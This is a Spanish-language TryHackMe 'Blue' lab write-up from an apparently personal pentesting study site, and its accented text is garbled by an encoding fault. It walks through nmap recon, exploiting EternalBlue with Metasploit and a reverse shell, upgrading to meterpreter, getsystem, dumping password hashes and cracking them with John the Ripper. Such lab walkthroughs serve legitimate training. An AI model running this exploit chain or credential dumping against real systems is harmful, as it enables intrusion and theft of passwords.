L4nk0n3
L4nk0n3
L4nk0n3
  • whoami
  • 馃嚞馃嚙EN
    • whoami
    • My RoadMap
    • RESOURCES
      • Notes
      • Platforms
      • Courses
        • eJPTv2
  • 馃嚜馃嚫ESP
    • whoami
    • Mi RoadMap
    • RECURSOS
      • Apuntes
      • Plataformas
      • Cursos
        • eJPTv2
        • PortSwigger Academy
        • TCM Security
        • HTB Bug Bounty Hunter
    • CERTIFICACIONES
      • eJPTv2
        • Preparaci贸n
        • CheatSheet
        • Mi experiencia
      • CBBH
        • Preparaci贸n
    • WRITEUPS
      • TryHackMe
        • Blue
Con tecnolog铆a de GitBook
En esta p谩gina
  • Introducci贸n
  • Task 1: Recon
  • Task 2: Gain Access
  • Task 3: Escalate
  • Task 4: Cracking
  • Task 5: Find Flags!
  1. ESP
  2. WRITEUPS
  3. TryHackMe

Blue

Introducci贸n

Esta m谩quina es un Windows 7 vulnerable a EternalBlue. Iremos avanzando por la m谩quina, con las preguntas que nos plantean nos servir谩n de gu铆a.

Task 1: Recon

Nos har谩n dos preguntas a las que podremos dar respuesta con los resultados de un escaneo con Nmap:

nmap -sV -sC -Pn <IP>

-sC: Ejecuci贸n de scripts predeterminados, estos nos permiten identificar vulnerabilidades a las que puede ser vulnerable el servicio u obtener informaci贸n adicional.

-sV: Identifica la versi贸n del servicio que se est谩 ejecutando en el puerto, y por tanto, podemos saber si ese servicio es vulnerable a alguna vulnerabilidad conocida.

-Pn: Desactiva el realizar un ping para descubrir el host.

Task 2: Gain Access

En esta task se nos har谩n 3 preguntas, para responderlas, utilizaremos Metasploit para explotar la vulnerabilidad que me hemos descubierto en la tarea de recon:

sudo msfconsole -q

msf6 > search eternalblue

msf6 > use 0

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <IP>

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

Task 3: Escalate

Pondremos en background la shell obtenida como nos indican al principio de esta task

[Ctrl+Z]

Para responder las preguntas de este apartado, usaremos un m贸dulo de post explotaci贸n disponible en Metasploit para convertir la shell obtenida en una shell de meterpreter:

msf6 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter

msf6 post(multi/manage/shell_to_meterpreter) > show options

msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1

msf6 post(multi/manage/shell_to_meterpreter) > run

msf6 post(multi/manage/shell_to_meterpreter) > sessions

msf6 post(multi/manage/shell_to_meterpreter) > sessions 2

meterpreter > getsystem

meterpreter > ps

meterpreter > migrate <PID proceso>

Task 4: Cracking

Se nos indicar谩 que comando usar para responder a una de las preguntas:

meterpreter > hashdump

Este comando en meterpreter har谩 un dumpeo de los hashes de las contrase帽as de cada usuario del sistema.

Tambi茅n existe un m贸dulo para Metasploit para ello:

meterpreter > background

msf6 post(multi/manage/shell_to_meterpreter) > use post/windows/gather/hashdump

msf6 post(windows/gather/hashdump) > options

msf6 post(windows/gather/hashdump) > set SESSION 2

msf6 post(windows/gather/hashdump) > run

msf6 post(windows/gather/hashdump) > creds

Para crackear estos hashes, podremos hacerlo con john directamente:

john --wordlist=<archivo de diccionario> --format=<formato de los hashes> <archivo txt con los hashes>

En Metasploit tambi茅n tenemos un m贸dulo para ello:

msf6 post(windows/gather/hashdump) > use auxiliary/analyze/jtr_windows_fast

msf6 auxiliary(analyze/jtr_windows_fast) > options

msf6 auxiliary(analyze/jtr_windows_fast) > set CUSTOM_WORDLIST <archivo de diccionario>

msf6 auxiliary(analyze/jtr_windows_fast) > run

Task 5: Find Flags!

En este apartado debemos introducir las diferentes flags que se pueden encontrar en el sistema que ya hemos vulnerado, para ellos nos moveremos por los directorios del sistema:

// Abrir la sesi贸n con la shell en el sistema v铆ctima
msf6 post(multi/manage/shell_to_meterpreter) > sessions 1

// Moverse a un directorio
C:\Windows\system32>cd <directorio>

// Listar contenido de un directorio
C:\>dir

// Mostrar contenido del archivo
C:\>type <archivo.txt>
AnteriorTryHackMe

脷ltima actualizaci贸n hace 8 meses

Con estos comandos b谩sicos para moverse en el sistema y conociendo la estructura de carpetas de Windows conseguir谩s las flags y habr谩s completado el laboratorio

馃嚜馃嚫
馃憤